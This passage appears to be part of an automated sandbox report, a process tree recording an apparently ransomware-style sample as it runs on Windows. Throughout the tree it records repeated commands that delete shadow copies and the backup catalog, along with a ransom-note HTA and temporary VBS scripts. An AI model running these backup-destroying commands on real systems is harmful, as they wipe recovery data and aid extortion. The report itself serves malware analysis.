                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      wmic shadowcopy delete
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5396
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4740
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C vssadmin.exe delete shadows /all /quiet
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            vssadmin.exe delete shadows /all /quiet
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Interacts with shadow copies
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5932
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              wmic shadowcopy delete
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3972
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4640
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Windows\System32\cmd.exe" /C vssadmin.exe delete shadows /all /quiet
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3396
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4604
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6268
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\!HELP_SOS.hta"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5312
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f1.vbs"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6500
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\schtasks.exe" /DELETE /TN /F "FsJjs3Fo"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3660
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f31199139.vbs"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4460
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Windows\System32\cmd.exe" /C vssadmin.exe delete shadows /all /quiet
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4856
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6576
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7360
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7388
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7412
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7344
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7416
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2644
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7092
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5100
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7456
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7460
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2140
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6820
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7220
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7488
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4696
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2484
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7432
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7572
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\explorer.exe
